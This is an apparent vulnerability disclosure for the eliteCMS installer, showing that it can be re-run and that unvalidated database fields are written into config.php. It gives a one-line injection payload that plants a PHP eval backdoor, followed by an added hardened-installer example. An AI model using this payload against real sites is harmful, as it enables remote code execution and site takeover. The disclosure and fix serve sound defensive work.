After the eliteCMS installer finishes, it is not locked, so an attacker can re-run the installation simply by visiting the installer's URL.

Another vulnerability: the installer can write a one-line PHP backdoor directly into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    // ... omitted ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The session values are interpolated straight into PHP source, unescaped.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" . mysql_error());\n";
    $write .= "\n";
    $write .= "}\n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" . mysql_error());\n";
    $write .= "\n";
    $write .= "}\n";
    $write .= "?>\n";

    // Whatever is in $write is written verbatim to config.php.
    $writer = fopen($file, 'w');
    ...
Now look at where those session values come from:
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken from POST without any validation.
If the database name (DB_NAME) field is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
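As an added example that is not part of the original post or of eliteCMS, here is how the step-4 writer could be hardened against both problems described above: an install lock so the installer refuses to run again once setup has completed, an allowlist check on every field before it is stored in the session, and var_export() so the values land in config.php as PHP string literals rather than being spliced into source text. The lock-file path, the function names validate_db_field(), build_config() and write_config(), and the regular expressions are assumptions; the generated mysql_* connection code from the original is left out.

```php
<?php
// Added example, not eliteCMS code. Hardened installer step 4.
session_start();

// 1. Refuse to run once installation has completed (assumed lock path).
define('INSTALL_LOCK', __DIR__ . '/install.lock');
if (file_exists(INSTALL_LOCK)) {
    http_response_code(403);
    die('Installation already completed. Delete install.lock to re-run the installer.');
}

// 2. Allowlist check for each field (assumed rules). Rejecting early means a
//    hostile value never reaches the session, let alone the config file.
function validate_db_field(string $name, string $value): string
{
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/', // host or host:port
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.\-]{1,32}$/',
        'DB_PASS'   => '/^[^\r\n\0]{0,128}$/',                 // any printable text
    ];
    if (!isset($rules[$name]) || !preg_match($rules[$name], $value)) {
        throw new InvalidArgumentException("Invalid value for $name");
    }
    return $value;
}

// 3. Build config.php with var_export(): each value becomes a quoted PHP
//    literal with quotes and backslashes escaped, so text such as ?> or "
//    stays inside the string instead of ending it. No closing ?> tag is
//    emitted, which also avoids stray output after the config.
function build_config(array $settings): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $value = validate_db_field($key, $settings[$key] ?? '');
        $out .= sprintf("define('%s', %s);\n", $key, var_export($value, true));
    }
    return $out;
}

// 4. Write atomically with restrictive permissions so a half-written or
//    world-readable config is never exposed.
function write_config(string $file, string $contents): void
{
    $tmp = $file . '.tmp';
    if (file_put_contents($tmp, $contents, LOCK_EX) === false) {
        throw new RuntimeException('Could not write config file');
    }
    chmod($tmp, 0640);
    if (!rename($tmp, $file)) {
        unlink($tmp);
        throw new RuntimeException('Could not install config file');
    }
}

// Earlier step: validate at the POST boundary before storing in the session.
if (($_GET['step'] ?? '') === '3') {
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $_SESSION[$key] = validate_db_field($key, (string) ($_POST[$key] ?? ''));
    }
}

// Step 4: write config.php from the validated session values, then lock.
if (($_GET['step'] ?? '') === '4') {
    $config = build_config([
        'DB_SERVER' => $_SESSION['DB_SERVER'] ?? '',
        'DB_NAME'   => $_SESSION['DB_NAME'] ?? '',
        'DB_USER'   => $_SESSION['DB_USER'] ?? '',
        'DB_PASS'   => $_SESSION['DB_PASS'] ?? '',
    ]);
    write_config(__DIR__ . '/../admin/includes/config.php', $config);
    // 5. Create the lock so the installer cannot be replayed.
    file_put_contents(INSTALL_LOCK, date('c'));
}
```

Validation runs twice on purpose: once when the values arrive from POST and again when they are serialized, so a later change to how the session is populated cannot reintroduce the hole. Even if every check were removed, var_export() alone keeps the value inside a string literal, which is the layer that stops source injection; the allowlist is there so that nonsense never reaches the database layer either. Deleting the installer directory after setup is still the simplest complement to the lock file.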